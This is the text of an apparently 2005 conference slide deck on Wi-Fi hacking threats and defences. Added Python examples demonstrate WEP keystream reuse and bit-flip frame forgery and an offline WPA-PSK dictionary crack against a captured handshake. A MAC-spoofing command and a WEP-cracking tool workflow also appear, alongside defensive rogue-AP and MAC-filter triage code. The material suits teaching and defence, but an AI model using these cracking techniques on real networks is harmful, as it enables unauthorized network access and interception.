WLAN Hacking: Threats and Countermeasures

RSA Europe, Vienna, 18 October

John Rhoton, HP Services, Mobile Technology Lead


Objectives

• Describe state of WLAN security

— Mechanisms

— Vulnerabilities/threats/exploits

• Provide countermeasures and best practices to address threats

WLAN security mechanisms (figure: ladder from weakest to strongest)

• SSID

• MAC filter

• WEP

• WPA / 802.11i

Needs determine security

MAC Filters

• Requires management of authorized MAC addresses

• A LAA (Locally Administered Address) set in software overrides the UAA (Universally Administered Address) burned into the card, so an attacker who sniffs an authorized address can simply adopt it; the filter only sees the unauthenticated source address in the frame header
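To make the LAA/UAA point concrete, here is an added example (not code from the presentation) that models what a MAC filter checks and what a monitoring tool can and cannot infer from the U/L bit. The authorized inventory and the observed addresses are constructed; the U/L bit rule (bit 0x02 of the first octet set means locally administered) is the IEEE 802 convention.

```python
"""MAC filtering versus MAC spoofing.

Added example, not from the original presentation.  The authorized inventory
and the observed client addresses are constructed; the U/L bit test is the
IEEE 802 rule (bit 0x02 of the first octet set = locally administered).
"""

# Constructed inventory of addresses an AP's MAC filter would accept.
AUTHORIZED = {"00:02:2d:1a:2b:3c", "00:0c:f1:4d:5e:6f"}


def normalize(mac: str) -> str:
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabb.ccdd.eeff; return lower-case colon form."""
    digits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def is_locally_administered(mac: str) -> bool:
    """U/L bit: 1 = LAA (set by software or the operator), 0 = UAA (burned in by the vendor)."""
    return bool(int(normalize(mac)[:2], 16) & 0x02)


def mac_filter_allows(mac: str) -> bool:
    """All a MAC filter can check: the (unauthenticated) source address in the frame header."""
    return normalize(mac) in AUTHORIZED


def triage_clients(observed: list) -> dict:
    """Classify observed client addresses the way a monitoring tool could.

    "authorized"  : passes the filter.  A freeloader who sniffed this address and
                    set it on his own card lands here too; by MAC alone the two
                    stations are indistinguishable (two stations sharing one
                    address, or 802.11 sequence-number jumps, are the tell).
    "spoofed-laa" : fails the filter and has the U/L bit set: an address someone
                    typed in rather than a vendor-assigned one.
    "unknown-uaa" : fails the filter, looks like a genuine card.
    """
    verdicts = {}
    for mac in observed:
        m = normalize(mac)
        if mac_filter_allows(m):
            verdicts[m] = "authorized"
        elif is_locally_administered(m):
            verdicts[m] = "spoofed-laa"
        else:
            verdicts[m] = "unknown-uaa"
    return verdicts


if __name__ == "__main__":
    # Constructed observation: the first entry is the legitimate owner's address
    # exactly as a freeloader would copy it after sniffing a single frame.
    for mac, verdict in triage_clients(
        ["00-02-2D-1A-2B-3C", "02:00:00:aa:bb:cc", "00:16:6f:11:22:33"]
    ).items():
        print(mac, verdict)
```

On Linux the freeloader's side of this is one command (`ip link set dev wlan0 address 00:02:2d:1a:2b:3c` with the interface down), and because the copied address keeps the vendor's U/L bit clear, the LAA heuristic catches only the lazy spoofer who picks a made-up address.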

802.11b Security Vulnerabilities

• Symmetric secret keys

—Poor key management

—Hardware theft is equivalent to key theft

• Algorithmic weaknesses

—WEP (RC4 with a short, frequently reused IV; a linear CRC for integrity)

—Packet spoofing; deauthentication/disassociation attacks (management frames are not authenticated)

—Replay attack (no sequence counter, so captured frames can be re-sent)

• Decoy AP

• Rogue AP

Equipment of a Wi-Fi freeloader

• Mobile device

— Linux

— Windows

— Pocket PC

• Wireless card

— Orinoco card

— Prism 2 card

• Driver supporting monitor (RFMON) mode, often loosely called promiscuous mode, so raw 802.11 frames can be captured

• Cantenna and wireless MMCX to N type cable

War driver gone wild

Bringing the “War” to War Driving


Tools

• NetStumbler—access point reconnaissance

— http://www.netstumbler.com

• WEPCrack—recovers WEP keys (first public implementation of the FMS weak-IV attack)

— http://wepcrack.sourceforge.net/

• AirSnort—recovers WEP keys passively

— Needs 5-10 million captured packets (enough weak IVs)

— http://airsnort.shmoo.com/

• chopper

— Released August 2004

— Reduces the number of necessary packets to 200-500 thousand

• Aircrack, Airopeek, Airsnare, Airmagnet, Airjack, Aerosol, Kismet, Packetyzer, NAI Sniffer, Retina WiFi Scanner…

NetStumbler (screenshot)

WiFiFoFum (screenshot)

AirSnort cracked the WEP key in about 16 hours (screenshot)

• chopper reduces this by an order of magnitude

FBI – ISSA Los Angeles 2005

FBI Computer Scientist James C. Smith (left) and FBI Special Agent Geoff Bickers (right) broke a 128-bit WEP key in three minutes

Ten-minute WEP crack

• Kismet

— reconnaissance (find the target BSSID and channel)

• Airodump

— packet capture (the captured IVs are fed to aircrack, which does the key recovery)

• Void11

— deauth attack (forces clients to reconnect and generate traffic)

• Aireplay

— replay attack (re-injects captured frames, typically ARP requests, so the AP emits fresh IVs quickly instead of waiting hours for natural traffic)

Source: tom's networking

Wireless LAN security evolution

Timeline (security increases left to right):

WEP (1999)

— Privacy: 40-bit RC4 with 24-bit IV

— Auth: SSID and shared key

— Integrity: CRC

WPA (2003)

— Privacy: per-packet keying (RC4/TKIP) with 48-bit IV

— Auth: 802.1x + EAP

— Integrity: MIC

802.11i / WPA2 (2005)

— Privacy: AES

— Auth: 802.1x + EAP

— Integrity: MIC
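The WEP column above (40-bit RC4, 24-bit IV, CRC integrity) and the "packet spoofing" and "replay" items on the 802.11b vulnerabilities slide come down to two facts: keystream reuse whenever an IV repeats, and a linear integrity check. The following added example (not code from the presentation) reproduces both in miniature. RC4 and CRC-32 are WEP's real primitives; the 40-bit key, the IV and the frame payloads are constructed.

```python
"""WEP's two structural weaknesses, reproduced in miniature.

Added example, not part of the original presentation.  RC4 and CRC-32 are the
real WEP primitives; the 40-bit key, IVs and frame payloads are constructed.
"""
import math
import zlib

KEY_40 = bytes.fromhex("0102030405")          # constructed 40-bit WEP key


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling followed by n bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, sent in clear) || RC4_{IV||key}(plaintext || ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Decrypt and verify the ICV; raises only on tampering the CRC can actually detect."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    if tag != icv(plaintext):
        raise ValueError("ICV mismatch")
    return plaintext


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV (and key) share keystream: C_a xor C_b = P_a xor P_b.
    No key needed; with 24-bit IVs a busy AP repeats IVs within hours."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("different IVs, no keystream reuse")
    n = min(len(frame_a), len(frame_b)) - 3 - 4
    return xor(frame_a[3:3 + n], frame_b[3:3 + n])


def bit_flip_forge(frame: bytes, delta: bytes) -> bytes:
    """Packet spoofing without the key: flip plaintext bits by flipping ciphertext bits.
    CRC-32 is affine, so crc(P xor D) = crc(P) xor crc(D) xor crc(0...0), and the
    encrypted ICV is repaired by xoring that same constant into it."""
    iv, ct = frame[:3], frame[3:]
    body, enc_icv = ct[:-4], ct[-4:]
    if len(delta) != len(body):
        raise ValueError("delta must cover the whole payload")
    fix = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    new_icv = (int.from_bytes(enc_icv, "little") ^ fix).to_bytes(4, "little")
    return iv + xor(body, delta) + new_icv


def iv_exhaustion(frames_per_second: float):
    """(seconds to cycle the 2^24 IV space at the given rate,
        expected frames before the first collision if IVs are drawn at random)."""
    space = 2 ** 24
    return space / frames_per_second, int(math.sqrt(math.pi * space / 2))


if __name__ == "__main__":
    iv = b"\x00\x00\x01"                                  # constructed IV
    m1 = b"GET /index.html HTTP/1.0"                      # constructed payloads
    m2 = b"GET /admin.html HTTP/1.0"
    f1, f2 = wep_encrypt(KEY_40, iv, m1), wep_encrypt(KEY_40, iv, m2)
    print(keystream_reuse_leak(f1, f2) == xor(m1, m2))    # True: plaintext XOR leaks
    forged = bit_flip_forge(f1, xor(m1, m2))
    print(wep_decrypt(KEY_40, forged))                    # the AP accepts m2 as valid
    print(iv_exhaustion(1000))                            # IV space gone in ~4.7 h at 1000 fps
```

The second result is why the slide lists packet spoofing without mentioning key recovery: an attacker who knows (or guesses) part of a plaintext can rewrite that part of any captured frame and the AP will accept it. The FMS-style key recovery that AirSnort and chopper perform is a separate, additional weakness of RC4's key scheduling.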

Improved Security Proposals (WPA)

• Temporal Key Integrity Protocol (TKIP)

—Fast/per-packet keying

—Message Integrity Check (MIC)

• The MIC (the Michael algorithm, keyed and non-linear) replaces the CRC-32 ICV, so flipping ciphertext bits no longer yields a frame that passes the integrity check

• WPA-Personal

—Pre-shared key derived from an alphanumeric passphrase and the SSID

• WPA-Enterprise

—802.1x (adapted for 802.11 MAC by 802.11i WG) with EAP

—No predefined EAP mechanisms
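WPA-Personal fixes WEP's cipher problems but moves the risk to the passphrase. As an added example (not code from the presentation), the block below walks the 802.11i derivation from passphrase to the handshake MIC and then runs the offline dictionary attack that a captured 4-way handshake permits. The derivation steps (PBKDF2-HMAC-SHA1 for the PSK, PRF-based pairwise key expansion, HMAC-SHA1 EAPOL-Key MIC as used with CCMP) are the standard's; the SSID, MAC addresses, nonces, EAPOL-Key frame and wordlist are constructed.

```python
"""WPA/WPA2-Personal: passphrase -> PMK -> PTK -> handshake MIC, and the offline guess it enables.

Added example, not from the original presentation.  The derivations are the IEEE 802.11i ones
(PBKDF2-HMAC-SHA1 for the PSK, PRF-based pairwise key expansion, HMAC-SHA1 EAPOL-Key MIC as used
with CCMP).  The SSID, MAC addresses, nonces, EAPOL-Key frame and wordlist are constructed.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-Personal PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def pairwise_transient_key(pmk, aa, spa, anonce, snonce, nbytes=48):
    """PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    48 bytes for CCMP; bytes 0..15 are the KCK that authenticates the handshake messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, eapol_frame_with_mic_zeroed: bytes) -> bytes:
    """EAPOL-Key MIC for the PSK/CCMP suite: HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def make_capture(passphrase: str) -> dict:
    """Build a constructed 4-way-handshake capture: everything an attacker sees on the air.
    The passphrase is used only here, to compute the MIC the real client would have sent."""
    cap = {
        "ssid": "CorpNet",                                   # constructed
        "aa": bytes.fromhex("000c41d1e2f3"),                 # AP MAC, constructed
        "spa": bytes.fromhex("00022d1a2b3c"),                # client MAC, constructed
        "anonce": bytes(range(32)),                          # constructed nonces
        "snonce": bytes(range(32, 64)),
        # stand-in for EAPOL-Key message 2 with its MIC field zeroed; contents constructed
        "eapol": bytes.fromhex("0103007502010a00") + bytes(8) + bytes(range(32, 64)) + bytes(40) + b"\x00\x00",
    }
    pmk = wpa_pmk(passphrase, cap["ssid"])
    kck = pairwise_transient_key(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])[:16]
    cap["mic"] = eapol_mic(kck, cap["eapol"])
    return cap


def crack_psk(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 run (4096 SHA-1 rounds) per guess, no further
    contact with the AP and no lockout.  Passphrase length and randomness are the only defence."""
    for guess in wordlist:
        pmk = wpa_pmk(guess, capture["ssid"])
        kck = pairwise_transient_key(pmk, capture["aa"], capture["spa"],
                                     capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    cap = make_capture("summer2005")       # the "real" passphrase, constructed
    print(crack_psk(cap, ["123456", "password", "summer2005", "letmein"]))   # summer2005
```

Two things follow for the WPA-Personal bullet above: the PSK is bound to the SSID, so a common SSID lets precomputed tables serve many networks, and the only cost per guess is 4096 SHA-1 rounds, which is why WPA-Enterprise (per-user credentials, no shared secret) is the enterprise recommendation on the later slides.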

IEEE 802.1x Explanation

(figure: supplicant, authenticator with a controlled and an uncontrolled port, authentication server)

• Restricts network access at the port: only EAP traffic passes the uncontrolled port until authentication succeeds and the controlled port is opened

• Handles automated key change

• Can use existing authentication system

EAP methods are client/server dependent

• Both client and RADIUS server must support the same EAP method

• Microsoft

—supports EAP API for XP and W2K

—EAP-MD5 disallowed for wireless

—EAP-TLS in Windows XP release

—Service Pack 1 adds Protected EAP (PEAP), which tunnels an inner method inside a TLS (SSL) channel

—PEAP with MS-CHAPv2—passwords

—PEAP with EAP-TLS—certificates; PEAP-EAP-TLS is a little slower than EAP-TLS

—PEAP clients must be configured to validate the server certificate, otherwise a rogue AP with its own RADIUS server can terminate the tunnel and collect MS-CHAPv2 credentials

• SecurID—but not tested/supported for wireless

802.1x Implementation

• 802.1x supplicant

• 802.1x capable Access Point

• 802.1x Authentication Server

(figure: Supplicant (client) <- EAP over 802.1x -> Authenticator (access point) <- EAP over RADIUS -> Authentication Server (RADIUS server))

802.11i / WPA2

• Ratified June 2004

• AES selected by National Institute of Standards and Technology (NIST) as replacement for DES

• Symmetric-key block cipher

• Computationally efficient

• Key sizes of 128, 192 or 256 bits (CCMP uses 128-bit keys)

• Counter Mode with CBC-MAC Protocol (CCMP, built on the CCM mode of RFC 3610) replaces TKIP and provides both encryption and the MIC from one AES key

• May require equipment upgrades—some WPA implementations already support AES

• Update for Windows XP (KB893357)

• Transition Security Networks (TSN) interoperate with WEP

• Robust Security Networks (RSN) prohibit WEP

VPN Overlay

(figure: wireless clients tunnel through a VPN concentrator before reaching the intranet)

Role-based Access Control

• Bluesocket

• Perfigo (Cisco)

• Cranite

• Aruba

• HP ProCurve (Vernier)

(figure: user access control decisions keyed on role, schedule, location, IP address, port, time and VLAN)

Enterprise WLAN Security Options

• WPA-Enterprise

— Eventual transition to 802.11i

— Requires WPA-compliant APs and NICs

• VPN Overlay

— Performance overhead (20-30%)

— VPN concentrator required

• RBAC

— Additional appliance and infrastructure

— Most refined access

Home WLAN: WPA-Personal with a long passphrase where the equipment supports it, otherwise WEP with key rotation; firewall; intrusion detection

Public WLAN: MAC address filter, secure billing, VPN passthrough

Rogue Access Points

• Highest risk where the organization has NOT deployed a WLAN

— Usually completely unsecured

— Connected by naïve (rather than malicious) users who want wireless access

• Intrusion detection products

— Manual sweeps, dedicated sensors, or detection built into the WLAN infrastructure

• Multi-layer perimeters

— 802.1x

— RBAC, VPN

(figure: Internet and intranet access through layered perimeters)
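The detection step behind "intrusion detection products" is mostly comparing what is on the air with what the organization owns. The block below is an added example (not code from the presentation or from any of the vendors listed) that runs that comparison over scan results and separates the cases the slides name: a decoy AP advertising the corporate SSID, an authorized AP that someone reset to open, and the unsecured consumer AP a naïve user plugs in. The scan CSV (BSSID, SSID, channel, security) and the inventory are constructed.

```python
"""Rogue / decoy access point triage over scan results.

Added example, not from the original presentation.  The scan is constructed CSV
(BSSID, SSID, channel, security) of the kind a sensor or a scripted `iwlist scan`
could emit, and the authorized-AP inventory is constructed too.
"""
import csv
import io

# Constructed inventory: BSSID -> (SSID, channel) of every AP the organization owns.
AUTHORIZED_APS = {
    "00:0c:41:d1:e2:f3": ("CorpNet", 6),
    "00:0c:41:d1:e2:f4": ("CorpNet", 11),
    "00:0c:41:d1:e2:f5": ("CorpNet", 1),
}
CORPORATE_SSIDS = {ssid for ssid, _ in AUTHORIZED_APS.values()}
REQUIRED_SECURITY = "WPA-EAP"

# Constructed scan: two healthy corporate APs, one corporate AP reset to open,
# a decoy using our SSID, a stray consumer AP, and a software AP with a locally
# administered BSSID.
SCAN = """bssid,ssid,channel,security
00:0c:41:d1:e2:f3,CorpNet,6,WPA-EAP
00:0c:41:d1:e2:f4,CorpNet,11,WPA-EAP
00:0c:41:d1:e2:f5,CorpNet,1,OPEN
00:13:10:aa:bb:cc,CorpNet,1,OPEN
00:09:5b:12:34:56,linksys,6,OPEN
02:1a:2b:3c:4d:5e,CorpNet-Guest,11,WEP
"""


def parse_scan(text: str) -> list:
    """Parse CSV scan output into records with normalized fields."""
    out = []
    for rec in csv.DictReader(io.StringIO(text)):
        out.append({
            "bssid": rec["bssid"].strip().lower(),
            "ssid": rec["ssid"].strip(),
            "channel": int(rec["channel"]),
            "security": rec["security"].strip().upper(),
        })
    return out


def classify_ap(ap: dict) -> tuple:
    """Return (verdict, findings) for one observed AP."""
    findings = []
    known = AUTHORIZED_APS.get(ap["bssid"])
    if known is not None:
        if (ap["ssid"], ap["channel"]) != known:
            findings.append("inventory mismatch")
        if ap["security"] != REQUIRED_SECURITY:
            findings.append("weakened security")
        return ("authorized" if not findings else "authorized-misconfigured", findings)
    if ap["ssid"] in CORPORATE_SSIDS:
        # Our SSID on a BSSID we do not own: a decoy (evil twin) or an unauthorized extension.
        return ("evil-twin", ["corporate SSID on unknown BSSID"])
    if ap["security"] in ("OPEN", "WEP"):
        findings.append("open or WEP")
    if int(ap["bssid"][:2], 16) & 0x02:
        findings.append("locally administered BSSID (software AP?)")
    # "unknown" covers both a neighbour's AP and a rogue on our wire; telling them apart
    # needs a second source, e.g. the AP's wired MAC (usually adjacent to its BSSID)
    # turning up in a switch's MAC address table.
    return ("unknown", findings)


def triage(text: str) -> dict:
    return {ap["bssid"]: classify_ap(ap) for ap in parse_scan(text)}


if __name__ == "__main__":
    for bssid, (verdict, findings) in triage(SCAN).items():
        print(bssid, verdict, "; ".join(findings))
```

The "unknown" bucket is the honest limit of radio-only detection, which is why the slide lists infrastructure-integrated detection alongside sensors: correlating the BSSID with the wired side is what turns "unknown" into "rogue" or "neighbour".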

Summary

• WLAN security had a bad start

— WEP is insufficient

— MAC filtering is even worse

• WPA and 802.11i are solid

— As far as we know today…

• Consider multi-layer perimeter control (VPN, RBAC)

• Opting out is not an option

— Rogue access points are the biggest threat of all!

Send mail to: [email protected]